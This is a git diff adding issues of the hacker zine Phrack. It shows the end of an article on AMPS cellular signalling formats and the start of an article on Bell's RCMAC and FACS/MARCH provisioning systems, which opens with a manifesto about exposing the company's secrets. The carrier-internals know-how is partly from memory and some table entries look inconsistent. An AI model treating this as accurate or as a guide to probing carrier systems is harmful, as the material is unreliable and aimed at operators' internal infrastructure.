+     +-------+-------+-------+-----------------+-------+-------+----------+
+     | T  T  |       |  ACT  |                 |       |  OHD  |          |
+     |  1  2 |       |       |                 |       |       |          |
+     |   =   |  DCC  |   =   |  LOCAL CONTROL  |  END  |   =   |     P    |
+     |       |       |       |                 |       |       |          |
+     |   11  |       |  1110 |                 |       |  100  |          |
+     +-------+-------+-------+-----------------+-------+-------+----------+
+         2       2       4            16           1       3        12
+
+
+     Local Control 2 Message
+
+     +-------+-------+-------+-----------------+-------+-------+----------+
+     | T  T  |       |  ACT  |                 |       |  OHD  |          |
+     |  1  2 |       |       |                 |       |       |          |
+     |   =   |  DCC  |   =   |  LOCAL CONTROL  |  END  |   =   |     P    |
+     |       |       |       |                 |       |       |          |
+     |   11  |       |  1111 |                 |       |  100  |          |
+     +-------+-------+-------+-----------------+-------+-------+----------+
+         2       2       4            16           1       3        12
+
+
+        The interpretation of the data fields are as follows:
+
+        T  T    - Type field.  Set to '11' indicating overhead word.
+         1  2
+        ACT     - Global action field (see table below).
+        BIS     - Busy-idle status field.
+        DCC     - Digital Color Code.
+        OHD     - Overhead Message type field.  Set to '100' indicating the
+                  global action message.
+        REGINCR - Registration increment field.
+        NEWACC  - News access channel starting point field.
+        MAXBUSY - Maximum busy occurrences field (page response).
+        - PGR
+        MAXBUSY - Maximum busy occurrences field (other accesses).
+        - OTHER
+        MAXSZTR - Maximum seizure tries field (page response).
+        - PRG
+        MAXSZTR - Maximum seizure tries field (other accesses).
+        - OTHER
+        OLCN    - Overload class field (N = 0 to 15)
+        END     - End indication field.  Set to '1' to indicate the last word
+                  of the overhead message train; set to '0' if not last word.
+        RSVD    - Reserved for future use, all bits must be set as indicated.
+        LOCAL   - May be set to any bit pattern.
+        CONTROL
+        P       - Parity field.
+
+The registration ID message consists of one word.  When sent, the message must
+be appended to a system parameter overhead message in addition to any global
+action messages.
+
+        +-------+-------+-------------+-------+-------+-----------+
+        | T  T  |       |             |       |  OHD  |           |
+        |  1  2 |       |             |       |       |           |
+        |   =   |  DCC  |    REGID    |  END  |   =   |     P     |
+        |       |       |             |       |       |           |
+        |   11  |       |             |       |  000  |           |
+        +-------+-------+-------------+-------+-------+-----------+
+            2       2          20         1       3         12
+
+        The interpretation of the data fields:
+
+        T  T    - Type field.  Set to '11' indicating overhead word.
+        DCC     - Digital color code field.
+        OHD     - Overhead message type field.  Set to '000' indicating the
+                  registration ID message.
+        REGID   - Registration ID field.
+        END     - End indication field.  Set to '1' to indicate last word of
+                  the overhead message train;  set to '0' if not.
+        P       - Parity field.
+
+
+The control-filler message consists of one word.  It is sent whenever there is
+no other message to be sent on the forward control channel.  It may be inserted
+between messages as well as between word blocks of a multiword message.  The
+control-filler message is chosen so that when it is sent, the 11-bit word
+sequence will not appear in the message stream, independent of the busy-idle
+bit status.
+
+The control-filler message is also used to specify a control mobile
+attenuation code (CMAC) for use by mobile stations accessing the system on the
+reverse control channel, and a wait-for-overhead-message bit (WFOM) indicating
+whether or not mobile stations must read an overhead message train before
+accessing the system.
+
+  +-------+-----+------+------+------+--+------+---+------+----+-----+-----+
+  | T  T  |     |      |      | RVSD |  | RVSD |   |      |    | OHD |     |
+  |  1  2 |     |      |      |      |  |      |   |      |    |     |     |
+  |   =   | DCC |010111| CMAC |  =   |11|  =   | 1 | WFOM |1111|  =  |  P  |
+  |       |     |      |      |      |  |      |   |      |    |     |     |
+  |   11  |     |      |      |  00  |  |  00  |   |      |    | 001 |     |
+  +-------+-----+------+------+------+--+------+---+------+----+-----+-----+
+      2      2      6      3     2     2    2    1     1     4    3     16
+
+        Interpretation of the data fields:
+
+        T  T    - Type field.  Set to '11' indicating overhead word.
+         1  2
+        DCC     - Digital color code field.
+        CMAC    - Control mobile attenuation field.  Indicates the mobile
+                  station power level associated with the reverse control
+                  channel.
+        RVSD    - Reserved for future use; all bits must be set as indicated.
+        WFOM    - Wait-for-overhead-message field.
+        OHD     - Overhead message type field.  Set to '001' indicating the
+                  control-filler word.
+        P       - Parity field.
+
+
+        Data Restrictions
+
+The 11-bit sequence (11100010010) is shorter than the length of a word, and
+therefore can be embedded in a word.  Normally, embedded word-sync will not
+cause a problem because the next word sent will not have the word-sync sequence
+embedded in it.  There are, however, three cases in which the word-sync
+sequence may appear periodically in the FOCC stream.  They are as follows:
+
+        o the overhead message
+        o the control-filler message
+        o Mobile station control messages with pages to mobile stations with
+          certain central office codes.
+
+These three cases are handled by:
+
+        1. Restricting the overhead message transmission rate to about once per
+           second
+        2. designing the control-filler message to exclude the word-sync
+           sequence, taking into account the various busy-idle bits
+        3. Restricting the use of certain office codes
+
+
+If the mobile station control message is examined with the MIN1 separated into
+NXX-X-XXX as described earlier (where NXX is the central office code, N
+represents a number from 2 - 9, and X represents a number from 0-9) the order
+and order qualifications table can be used to deduce when the word-sync word
+would be sent.  If a number of mobile stations are paged consecutively with the
+same central office code, mobile stations that are attempting to synchronize to
+the data stream may not be able to do so because of the presence of the false
+word sync sequence.  Therefore, the combinations of central office codes and
+groups of line numbers appearing in the following table must not be used for
+mobile stations.
+
+
+        RESTRICTED CENTRAL OFFICE CODES
+  +-------------------------------------------------------------------------+
+  |                                                   Central               |
+  |  T  T       DCC        NXX         X     XXX      Office      Thousands |
+  |   1  2                                             Code         Digit   |
+  +-------------------------------------------------------------------------+
+  |  01         11    000100(1)0000   ...    ...       175         0 to 9   |
+  |  01         11    000100(1)0001   ...    ...       176         0 to 9   |
+  |  01         11    000100(1)0010   ...    ...       177         0 to 9   |
+  |  01         11    000100(1)0011   ...    ...       178         0 to 9   |
+  |  01         11    000100(1)0100   ...    ...       179         0 to 9   |
+  |  01         11    000100(1)0101   ...    ...       170         0 to 9   |
+  |  01         11    000100(1)0110   ...    ...       181         0 to 9   |
+  |  01         11    000100(1)0111   ...    ...       182         0 to 9   |
+  |  0Z         11    100010(0)1000   ...    ...       663         0 to 9   |
+  |  0Z         11    100010(0)1001   ...    ...       664         0 to 9   |
+  |  0Z         11    100010(0)1010   ...    ...       665         0 to 9   |
+  |  0Z         11    100010(0)1011   ...    ...       666         0 to 9   |
+  |  0Z         Z1    110001(0)0100   ...    ...       899         0 to 9   |
+  |  0Z         Z1    110001(0)0101   ...    ...       800         0 to 9   |
+  |  0Z         ZZ    111000(1)0010   ...    ...       909         0 to 9   |
+  |  00         ZZ    011100(0)1001   0ZZZ   ...       568         1 to 7   |
+  |  00         ZZ    111100(0)1001   0ZZZ   ...       070         1 to 7   |
+  |  00         ZZ    001110(0)0100   10ZZ   ...       339          8,9,0   |
+  |  00         ZZ    011110(0)0100   10ZZ   ...       595          8,9,0   |
+  |  00         ZZ    101110(0)0100   10ZZ   ...       851          8,9,0   |
+  |  00         ZZ    111110(0)0100   10ZZ   ...       007          8,9,0   |
+  |  0Z         ZZ    000011(1)0100   0010   ...       150            2     |
+  |  0Z         ZZ    000111(1)0001   0010   ...       224            2     |
+  |  0Z         ZZ    001011(1)0001   0010   ...       288            2     |
+  |  0Z         ZZ    001111(1)0001   0010   ...       352            2     |
+  |  0Z         ZZ    010011(1)0001   0010   ...       416            2     |
+  |  0Z         ZZ    010111(1)0001   0010   ...       470            2     |
+  |  0Z         ZZ    011011(1)0001   0010   ...       544            2     |
+  |  0Z         ZZ    011111(1)0001   0010   ...       508            2     |
+  |  0Z         ZZ    100011(1)0001   0010   ...       672            2     |
+  |  0Z         ZZ    100111(1)0001   0010   ...       736            2     |
+  |  0Z         ZZ    101011(1)0001   0010   ...       790            2     |
+  |  0Z         ZZ    101111(1)0001   0010   ...       864            2     |
+  |  0Z         ZZ    110011(1)0001   0010   ...       928            2     |
+  |  0Z         ZZ    110111(1)0001   0010   ...       992            2     |
+  |  0Z         ZZ    111011(1)0001   0010   ...       056            2     |
+  |  0Z         ZZ    111111(1)0001   0010   ...       ...            2     |
+  +-------------------------------------------------------------------------+
+
+
+1. In each case, Z represents a bit that may be 1 or 0.
+2. Some codes are not used as central office codes in the US at this time.
+   They are included for completeness.
+3. The bit in parentheses is the busy-idle bit.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Well there is your signaling in a nutshell.  Please note I hardly have the most
+up-to-date signalling data.  Basically what was presented here was a skeleton,
+the bare bones without all the additions.  There are some additions that are
+system specific.  As I get updates I'll be sure to share them with the rest of
+you.  I would be interested in any feedback, so, if you have something to say,
+send it to:
+
+                        oblivion@atdt.org
+
+
+In the last article I said that there would be a listing of SID codes
+accompanying the article.  Well, I forgot to edit that line out, but if you
+would like a copy of it, just mail me at the above address an you shall receive
+one.
+
+In the next article I will be going in-depth on the actual hardware behind the
+Mobile telephone, the chip sets, and its operation.  I will also publish any
+updates to the previous material I find, as well as information on the
+transitory NAMPS system that will be used to bridge the existing AMPS cellular
+network over to the ISDN compatible fully digital network.
+_______________________________________________________________________________
diff --git a/phrack40/7.txt b/phrack40/7.txt
new file mode 100644
index 0000000..819cea8
--- /dev/null
+++ b/phrack40/7.txt
@@ -0,0 +1,1374 @@
+                                ==Phrack Inc.==
+
+                     Volume Four, Issue Forty, File 7 of 14
+
+                        =/=/=/=/=/=/=/=^=\=\=\=\=\=\=\=
+                        =                             =
+                        =  The Fine Art of Telephony  =
+                        =                             =
+                        =       by Crimson Flash      =
+                        =                             =
+                        =\=\=\=\=\=\=\=!=/=/=/=/=/=/=/=
+
+
+Bell!  Bell!  Bell!  Your reign of tyranny is threatened, your secrets will
+be exposed.  The hackers have come to stake their claim and punch holes in your
+monopolistic control.  The 1990s began with an attack on us, but will end with
+our victory of exposing the secret government and corruption that lies behind
+your walls and screens.  Oppose us with all your might, with all your lies,
+with all your accountants and bogus security "professionals."  You can stop the
+one, but you'll never stop the many.
+
+A. Introduction
+B. Basic Switching
+C. RCMAC
+  1. Office Equipment
+  2. How Does All This Fit Into RCMAC
+  3. Function of RCMAC
+    a. Coordination of Recent Change Source Documentation
+    b. Processing of Recent Change Requests
+    c. Administrative Responsibilities and Interface Groups
+D. The FACS Environment
+E. Getting Ready For Recent Change Message
+  1. When MARCH Receives A Translation Packet (TP)
+  2. When MARCH Receives A Service Order Image
+F. MARCH Background Processing
+G. User Transaction in MARCH
+H. Service Order Forms
+I. COSMOS Service Order From The SOI Command
+J. MSR - MARCH Status Report (MARCH)
+K. Other Notes
+L. Recommended Reading
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ A. Introduction
+ ~~~~~~~~~~~~~~~
+     Bell.  Bell Bell Bell!  What is it about Bell?  I am not sure what my
+fascination is with them, but it never ceases nor does it ever diminish.  Maybe
+its because they are so private.  Maybe its because they find it possible to
+rip millions of people off daily and they do it with such great ease.  Or
+perhaps its just that they do not want anyone to know what they are doing.
+
+     Around my area down here in Texas (512), the Central Office buildings have
+large brick walls, cameras at each door, bright lights, and every piece of
+paper says in big block letters: "PROPRIETARY INFORMATION -- NOT FOR USE OR
+DISCLOSURE OUTSIDE OF SOUTHWESTERN BELL."  This message can be found on
+everything, but their phone books!  Why?
+
+     This files are about RCMAC and FACS/MARCH.  The information presented here
+is largely from memory.  If you think the information is wrong, then get the
+information yourself!  One thing to keep in mind is that nothing is in stone!
+Different BOCs (Bell Operating Companies) use different systems and have
+different ways of doing the same thing.  Like in some areas RCMAC is the CIC,
+the MLAC may not exist, so on and so forth.  So nothing is ever fully true with
+Bell, but then why should things like their systems differ from their policies
+and promises.  There is a Bellcore standard and then there is the real way it
+is done by your local BOC.
+
+
+ B. Basic Switching
+ ~~~~~~~~~~~~~~~~~~
+     A switching system (a switch) allows connect between two (or more) phone
+lines, or two trunks.  A basic T1 trunk is 24 lines on a 22 gauge, 4-wire
+twisted pair.  Not only does it allow connect, it also controls connection,
+where you call, and when someone calls you.  In short it controls everything
+about your phone!  From a large AT&T 5ESS switching 150,000+ line to a small 24
+line PABX (Private Automatic Branch Exchange, a switch), they control your
+phone service.
+
+     What's the big deal about telephone switches?  Telephony is the largest
+form of communications for just about everyone in the world!  Just try life
+without a phone line to your house.  I have four phone lines and sometimes that
+is still not enough.
+
+     Today's switches are digital.  This means that when you talk on the phone,
+your voice is converted to 1s and 0s (on or off, true or false).  This works in
+several steps:
+
+   [0] You call someone.
+   [1] Sampling -- The analog signal (your voice) is sampled at certain parts.
+       The output is called Pulse Amplitude Modulation (PAM) signal.
+   [2] Quantize -- The PAM signal is now measured for wave length high (or
+       amplitude) where numbers are given to the signal.
+   [3] Encoding -- In this step, the Quantized signal (with the numbers for the
+       height of the wavelength (amplitude)) is converted to an 8-bit binary
+       number.  The output of the 8-bit "word" may be either a "1" (a pulse) or
+       a "0" (no pulse).
+   [4] Encoding -- Produces a signal called a Pulse-Code Modulation (PCM)
+       signal.  PCM just means that the signal is modulating pulses (digital).
+       From this point, the signal is switched to where it needs to go.
+   [5] The PCM signal is where it needs to go.  The signal is now converted
+       back to analog.
+   [6] Decoding -- The 8-bit PCM signal is sent to the decoder to get the
+       number that measured the amplitude of the wave.
+   [7] Filtering -- This takes the PAM signal (the decoding produced) and it
+       reproduces the analog signal just as it was.
+
+                                           ___
+    [1]           [2]       [3]     [4]   | S |  [5]       [6]      [7]
+     ________   _________  ______         | w |         ________   ______
+    |        | |        | |      |   __   | i |   __   |        | |      |
+\/\/|Sampling|-|Quantize|-|Encode|__|  |__| t |__|  |__|Decoding|-|Filter|/\/
+    |________| |________| |______|        | c |        |________| |______|
+ |            |                       |   |_h_|    |
+ |           PAM                     PCM          PCM                       |
+Analog Signal (You Talking)             /      \             Analog Signal__|
+                                   /               \
+                              /                        \
+                         /                                 \
+                    /                                          \
+      Blow Up /   of the Switch                                     \
+        /                                                               \
+  /                                                                        \
+                        ___________________________
+           _____       |                           |       _____
+   1    T |     | T  1 |                           | 1  T |     |    1
+   -------|  T  |------|                           |------|  T  |-----
+          |_____|      |                           |      |_____|
+           _____       |                           |       _____
+   2    T |     | T  2 |            S              | 2  T |     |    2
+   -------|  T  |------|           mxn             |------|  T  |-----
+          |_____|   o  |                           |  o   |_____|
+           _____    o  |                           |  o    _____
+   m    T |     | T  m |                           | n  T |     |    n
+   -------|  T  |------|                           |------|  T  |-----
+          |_____|      |                           |      |_____|
+                       |___________________________|
+
+     The basic design of most of the switches today is a Time-Space-Time (TST)
+topology.  In the Time-Space-Time in the arrangement shown, time slot
+interchangers will interchange information between external channels and
+internal (space array) channels.
+
+     This is just a quick run through to gives you a general idea about
+switches without going into math and more technical ideas.  For a better
+understanding, get "Fundamentals of Digital Switching" by John C. McDonald.
+This book is well written and describes ideas that I cannot get into.
+
+
+ C. RCMAC
+ ~~~~~~~~
+     The Recent Change Memory Administration Center's (RCMAC) purpose is to
+make changes to the software in various Electronic Switching Systems (ESS).  An
+ESS uses a Stored Program Control (SPC) to provide telephone service.  Since
+people with phones and their services change often, the ESS uses a memory
+called Recent Change.  This Recent Change area of memory is used on a standby
+basis until the information can be updated into the semipermanent memory area
+of the ESS.  It is in the templar area that changes (or Recent Change Messages)
+are typed and held for updating into the semipermanent memory area (Recent
+Change Memory).
+
+     The following Switching Systems (switches for short) that have Recent
+Change:
+         -  1/1AESS
+         -  2/2BESS
+         -  3ESS
+         -  5ESS
+         -  Remote Switching System (RSS)
+         -  #5ETS
+         -  DMS100/200/250/300
+
+     Here is a typical hookup.  As you follow the diagram below, you will see:
+
+[1] Telephone subscriber connected to the Central Office by cables.
+[2] At the Central Office, each subscriber is connected to the Main
+    Distributing Frame.
+[3] The Cable and Pair is now connected to the Office Equipment (OE) at
+    another location on the MDF.
+                                           _______________
+    (Home Phone Lines)   M.D.F.           |               |
+      |--(Home Phone)    ___________      |               |
+      |--(Home Phone)   /__/|  /__ /|     |     D.S.S.    |
+      |--(Home Phone)   |\ ||__|/ | |-----|               |
+      |                 | _|_/_|__| |-----|   Equipment   |
+      |                 | /|/ \|  | |-----|               |
+      |                 | /||__| \| |-----|               |
+      |_________________|/_|/  |__|/      |_______________|
+
+      /                      |
+    Cables             Cross-Connects
+
+           [1]           [2]      [3]
+
+
+   1. Office Equipment
+   ~~~~~~~~~~~~~~~~~~~
+     The Office Equipment (OE) is identified by a unique numbering plan.  The
+equipment numbers identify the equipment location within the system.  The
+Equipment Numbers also vary from one type of equipment to another.
+
+     You also may find the OE (Office Equipment) referred to as the LEN (Line
+Equipment Number).  It is called a REN (Remote Equipment Number) in a case of
+RSS (Remote Switching System).
+
+     Each telephone number is assigned to a specific equipment location where
+they bid for dial tone.
+
+Here is an example of different types of Office Equipment:
+
+ 1/1AESS                                   #2ESS
+ ~~~~~~~                                   ~~~~~
+ OE 0 0 4  - 1 0 1 - 3 1 2                 OE 0 1 1 - 2 1 4 0
+    | |/     | | |   | |/                     | |/    | | |/
+    | |      | | |   | |                      | |     | | |
+    | |      | | |   | Level                  | |     | | Switch and Level
+    | |      | | |   Switch                   | |     | Concentrator
+    | |      | | Concentrator                 | |     Concentrator Group
+    | |      | Bay                            | Link Trunk Network
+    | |  Line Switch Frame                    Control Group
+    | Line Link
+    Control Group
+
+
+ #3ESS                                      Others
+ ~~~~~                                      ~~~~~~
+ OE 0 0 1 - 2 1 4 0                          1XB        =   XXXX-XXX-XX
+    | |/    | | | |                          1XB        =   XXXX-XXXX-XX
+    | |     | | | Level                      5XB        =   XXX-XX-XX
+    | |     | | Switch                       SXS        =   XXXX-XXX
+    | |     | Switch Group                   DMS-10     =   XXX-X-XX-X
+    | |     Concentrator                     5ESS       =   XXXX-XXX-XX
+    | Concentrator Group                     5ESS       =   XXXX-XX-XX
+    Control Group                            RSS        =   XXXX-X-XXXX
+                                             DMS-1/200  =   XXX-X-XX-XX
+
+   2. How Does All This Fit Into RCMAC?
+   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+RCMAC (Recent Change Memory Administration Center) is responsible for updating
+any Service Order activity.  This action will change a customer line or service
+in the Recent Change memory of the SPC switches.
+
+   3. Function of RCMAC
+   ~~~~~~~~~~~~~~~~~~~~
+The three basic functions performed in RCMAC are:
+
+  a. Coordination of Recent Change Source Documentation
+  b. Processing of Recent Change Requests
+  c. Administrative Responsibilities and Interface Groups
+
+
+In more detail:
+
+- Coordination of Recent Change Source Documentation
+
+     The first function is the coordination of Source Documents.  The main
+source of RC (Recent Change) is the Service Orders.  Service Orders are changes
+in a subscriber's service.  RCMAC, in addition to the input of the service
+order in the switches, is responsible for other activities such as:
+
+     - Simulated Facilities (SFG)
+     - Route Indexes
+     - Traffic Registers  (TR)
+     - Subscriber Line Usages (SLU)
+     - Service Observing Assignment (SOB)
+     - MARCH (MIZAR) RPM Updates
+
+     Terminal Communications to the switches and/or MARCH (MIZAR) typically use
+the AT&T Datakit.  RCMAC also is responsible for "HOT" requests from the I.C.
+(Installation Center) and other transmissions from the I.C.
+
+- Processing of Recent Change Requests
+
+     The second function of RCMAC is processing of RC messages.  This involves
+inputting and editing RC messages in the switches.  When RCMAC inputs messages,
+they are making a change to their customer's service.  The customers service is
+dependent on the prompt, accurate processing of RC source documents (Service
+Orders).
+
+     The due date (sometimes referred to as the Frame Due Date) remarks and
+time interval assigned to the order will govern the release of RC input to ESS.
+Due date is important because this is the date that the Service Order has to be
+completed (going through the FACS system, frame work done, and RC message
+inputted into the switch).
+
+Recent Change Requests
+
+    The RCMAC receives documentation for changes to the temporary memory areas
+of the various types of ESS equipment.  These changes may come in many forms
+and from many different sources.
+                                _________            _____
+                               |         |          |     |
+Service Orders---------------->|    R    |--------->| ESS |       _____
+Line Station Transfer--------->|    C    |          |_____|      |     |
+Service Observing------------->|    M    |---------------------->| ESS |
+Special Studies--------------->|    A    |           ______      |_____|
+Trouble Reports--------------->|    C    |          |     |
+Verifications----------------->|         |--------->| ESS |
+                               |_________|          |_____|
+
+     Some Recent Changes requests are Service Orders, Line Equipment Transfers
+(LET), Service Observing Requests (SOB), Special Studies (SLU), Trouble Reports
+and Verification (follow local procedure).  In short, it is taking this
+information and making the correct changes into the SPC switches.
+
+- Administrative Responsibilities and Interface Groups
+
+     - Control of errors.
+     - Monitor activity.
+     - Prepare administrative reports.
+     - Coordination of RCMAC operations and interface with other departments.
+     - Restore RC area of the switches in the event that RC memory is damaged
+       due to machine failure.
+
+Operational Interface
+
+     RCMAC must coordinate activities with many work groups to achieve accurate
+and quick RC for the ESSes.
+
+                       BSC/RSC & MKTG
+                             |
+                             |
+                   SCC       |       RSB
+                       \     |     /
+                         \   |   /
+                           \ | /
+            NAC ---------- RCMAC ---------- IC
+                           /   \
+                         /       \
+                       /           \
+                 Frame               MLAC
+
+     To help understand this better, here is a short description of each group
+that interfaces with RCMAC:
+
+SCC (Switching Control Center)
+
+     - Technical assistance to RCMAC
+     - Provide emergency coverage (off hours) for RCMAC.  This includes
+       service affecting problems.  They also coordinate any updates in
+       the ESS programs with RCMAC.
+
+NAC (Network Administration Center) provides RCMAC with:
+
+     - Line Class Codes (LCC) like 1FR (1-party Flat Rate).
+     - List of numbers that must be changed (in ESS memory) from one intercept
+       route index to another, prior to reassignment.
+     - Translation Assignments; Example:  Simulated Facilities Group (SFG).
+     - Area Transfer/Dial for Dial Assignment.
+     - Service Observing assignment.
+     - Subscriber Line Usages (SLU) study assignment.
+     - Customer Line Overflow study assignment.
+     - RPM updates for DMS 100 change in COSMOS tables USOC/NXX/Ltg.
+
+Frame (Frame Jeopardy Reports) Central Office (FCC) will interface with RCMAC
+for Line Equipment transfers.
+
+     - Problems encountered by the frame group when completing Service Orders
+       may be coordinated with the MLAC (Loop Assignment Center), or when
+       appropriate will be called directly to RCMAC (i.e. No Dial Tone on a new
+       connect).
+
+Business/Residence Service Center (BSC/RSC) and Marketing (MKTG)
+
+     - The BSC/RSC and MKTG determine what kind of service the customer wants,
+       generates Service Orders, and coordinates with RCMAC regarding special
+       services to customers.
+
+Repair Service Bureau (RSB) or Single Point of Contact (SPOC)
+
+     - Customer trouble reports may involve RC inputs; the RCMAC would work
+       closely with RSB or SPOC to clear such troubles.
+     - RCMAC is responsible for analyzing, investigating and resolving customer
+       trouble caused by RC input.
+
+Installation Center (IC) and/or Maintenance Center (MC)
+
+     - The IC/MC group is responsible for the administration function
+       associated with the completion and control of Service Order load.  This
+       invokes all orders whether they require field work or no field work.
+     - This Group is responsible for ensuring all service orders are taken care
+       of on the proper due date.
+
+Mechanized Loop Assignment Center (MLAC) or LAC
+
+     - Assigns Service Orders for RCMAC.
+     - Assigns customers loops (this group is not in all BOCs).
+
+
+ D. The FACS Environment
+ ~~~~~~~~~~~~~~~~~~~~~~~
+     To better understand RCMAC, Source Document flow, and a typical BOC as a
+whole, the FACS (Facility Administration Control System) is an important part
+of this.
+
+Systems in a FACS environment
+
+PREMIS - PREMises Information System
+         This system is divided into three parts:  the main PREMIS database,
+         PREMLAC (Loop Assignment) and PREMLAS (Loop Assignment Special
+         circuit).  This contains customer and address inventory and assigns
+         numbers.
+
+SOAC   - Service Order Analysis and Control
+         This system receives Service Orders from SORD and interprets and
+         determines facility requirements.  The system requests and receives
+         assignments from LFACS and COSMOS and forwards orders to MARCH,
+         forwards assignments to SORD, and also maintains Service Order history
+         and manages changes.
+
+LFACS  - Loop FACS contains all loop facilities inventory and responds to
+         requests for assignment.
+
+COSMOS - COmputer System for Mainframe OperationS contains all the OE inventory
+         and responds for OE request.
+
+SORD   - Service ORder and Distribution distributes Service Orders throughout
+         the system.
+
+MARCH -  MARCH is the Mizar upgrade which will come into play when the
+         Stromberg-Carlson (SxS and XBAR) is upgraded to Generic 17.1 (the
+         software interface is called NAC).  Though there is a problem with the
+         interface between MARCH and COSMOS (because the Generic Interface is
+         not supported by COSMOS), templates are used for MAN, AGE, LETS, etc.
+         Anyway, MARCH plays a big part in this system.  MARCH, aside from what
+         was talked about above, has a basic function of keeping RCMAC up to
+         date on the switches (MSR user transaction).  It is an RC message
+         manager which will allow one to modify messages (ORE), show usages
+         (MAR) and logs all transmissions.
+
+                           BASIC ORDER FLOW
+                           ~~~~~~~~~~~~~~~~
+                        PHASE I - COSMOS/MIZAR
+ __________
+|          |
+| Customer |
+| Request  |
+|__________|
+      |
+      V
+  _________
+ |         |
+ |  SORD   |
+ |_________|
+      |
+      V                      _________
+  __________                |         |
+ |          |               |  Work   |
+ |  SOAC    |  ---------->  | Manager |
+ |__________|               |  (WM)   |
+                            |_________|
+                                 |
+                                 |
+                                 V
+                            * * * * * *              _________
+                            *         *             |         |
+                            * COSMOS  *  ------->   |  MIZAR  |
+                            *         *             |_________|
+                            * * * * * *                  |
+                                                         |
+                                                         V
+                                                     _________
+                                                    |         |
+                                                    |  SPCS/  |
+                                                    | DIGITAL |
+                                                    | SWITCH  |
+                                                    |_________|
+
+===============================================================================
+
+                         PHASE II - SOAC/MARCH
+
+ __________
+|          |
+| CUSTOMER |
+| REQUEST  |
+|__________|
+     |
+     |
+     V
+ __________
+|          |
+|   SORD   |
+|__________|
+     |
+     |
+     V                  ___________                            _________
+ __________            |           |          _________       |         |
+|          |           |   WORK    |         |         |      |  SPCS/  |
+|   SOAC   |  ------>  |  MANAGER  | ------> |  MARCH  | ---> | DIGITAL |
+|__________|           |    (WM)   |         |_________|      |  SWITCH |
+                       |___________|                          |_________|
+
+===============================================================================
+
+... Then There Was MLAC
+
+     With conversion to FACS, a shift in the service order provisioning process
+was made from manual input by the LAC and NAC to mechanized data flow from SOAC
+to COSMOS (via Work Manager).  Tables used for Recent Change (CFINIT, USL, and
+CXM) and spare OE assignments reside in COSMOS, along with the Recent Change
+Message Generator (RCMG).  The LAC and NAC are now involved only on an
+exception basis (This will be explained in more detail later on).
+ ________
+|        |
+|  SORD  |
+|________|
+     |
+     |
+     V                  ____________
+ _________             |            |
+|         | ---------> |    FACS    |---
+|  SOAC   |            | COMPONENTS |   |
+|_________| <--------- | FOR ASGNS. |---
+     |                 |____________|
+     |
+     V          * * * * * * * * * * * * * * * * * *
+ _________      *  ___________                    *
+|         |     * |           |       ________    *        _______
+|   WM    |---> * | o SP OE   |      |        |   * RC    |       |
+|_________|     * | o CFINIT  |----> |  RCMG  |   * ----->| MARCH |
+                * | o USL     |      |________|   * MSG   |_______|
+                * | o CMX     |                   *           |
+                * |___________|                   *           |
+                *                                 *           V
+                *          C O S M O S            *        _________
+                * * * * * * * * * * * * * * * * * *       |         |
+                                                          |  SPCS/  |
+                                                          | DIGITAL |
+                                                          | SWITCH  |
+                                                          |_________|
+
+. . . NOW THERE IS SOAC/MARCH
+
+     With the SOAC/MARCH application (FACS/MARCH configuration), the primary
+source of service order data continues to be SOAC.  COSMOS is taken out of the
+Recent Change business with this application (except, like the LAC and NAC, on
+an exception basis) and becomes just another FACS Component.  The tables that
+resided in COSMOS or Recent Change are now duplicated in MARCH.
+
+     Instead of retrieving, storing, and passing on already-formatted Recent
+Change messages, MARCH now generates the Recent Change from the data passed
+from SOAC, as did COSMOS previously.
+ ________
+|        |
+|  SORD  |
+|________|
+     |
+     |
+     V                  ____________
+ _________             |            |
+|         | ---------> |    FACS    |---
+|  SOAC   |            | COMPONENTS |   |
+|_________| <--------- | FOR ASGNS. |---
+     |                 |____________|
+     |
+     V          * * * * * * * * * * * * * * * * * *
+ _________      *  ___________                    *
+|         |     * |           |       ________    *         _________
+|   WM    |---> * | o RPM     |      |        |   * RC     |         |
+|_________|     * | o CFINIT  |----> |  RCMG  |   * -----> |  SPCS/  |
+                * | o USL     |      |________|   * MSG    | DIGITAL |
+                * |___________|                   *        | SWITCH  |
+                *                                 *        |_________|
+                *            M A R C H            *
+                * * * * * * * * * * * * * * * * * *
+
+
+ E. Getting Ready For Recent Change Message
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+STARTING WITH SORD
+
+     Service Orders (SORD) contain FIDs and USOCs (Universal Service Order
+Codes [these codes tell the type of service the customer may have or get])
+followed by data specific to a customer's service request (SORD accesses PREMIS
+for telephone number and address data; other entries are made by the Service
+Representative).  The order is then passed to SOAC.
+
+THEN TO SOAC
+
+     SOAC uses internal tables to read the FIDs and USOCs passed by SORD to
+determine what information is required from the various components of FACS.
+SOAC then accesses the appropriate FACS components (LFACS for Cable Pair
+assignment; COSMOS for OE assignment) and gathers the required data.
+
+     Once all the data has been collected, SOAC passes the information to the
+Work Manager.  Data is either passed as is or translated by SOAC (again using
+internal tables) into language acceptable to the receiving systems (i.e.,
+COSMOS and MARCH).
+
+     SOAC passes information intended for MARCH in one of two ways:
+
+     TP-Flow-Through Translation Packets
+
+          Translation Packets (TPs) contain fully translatable data from which
+          MARCH can generate a Recent Change message. Determination is made by
+          SOAC based on the interface capabilities and its ability to read,
+          translate as required, and pass data.
+
+     Service Order Image
+
+          Service Order Images are sent to MARCH if SOAC is not able to pass
+          all required data.  Images require additional information, either
+          input manually or retrieved from COSMOS before Recent Change messages
+          are generated.
+
+WORK MANAGER - THE TRAFFIC COP
+
+     The primary function of Work Manager is to read the service order and
+determine where the data must be sent.  Decisions include:
+
+          COSMOS System                 MARCH System
+          COSMOS Wire Center            MARCH Switch
+          COSMOS Control Group          Serving RCMA
+
+     Work Manager passes the service order data to MARCH on a real time basis
+(orders that were previously held in COSMOS until requested by Frame Due Date
+[FDD] are now held in MARCH), either as a TP or an Image.
+
+
+  1. When MARCH Receives A Translation Packet (TP)
+  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(1)  A Translation Packet, passed from SOAC via Work Manager is received in
+     MARCH by the CIP, Communication Interface Program.
+
+(2)  When data is received by the CIP, it calls up the CTI or Job Control
+     Module.  The Job Control Module or CTI writes the data that is received to
+     a temporary file and informs TP Trans (Translation Translator) that an
+     order has been received.  It also controls the number of simultaneous jobs
+     submitted to TPTrans.
+
+(3)  TPTrans analyzes the order in the temporary file, does appropriate FID
+     conversion (such as stripping out dashes), reformats the order, and passes
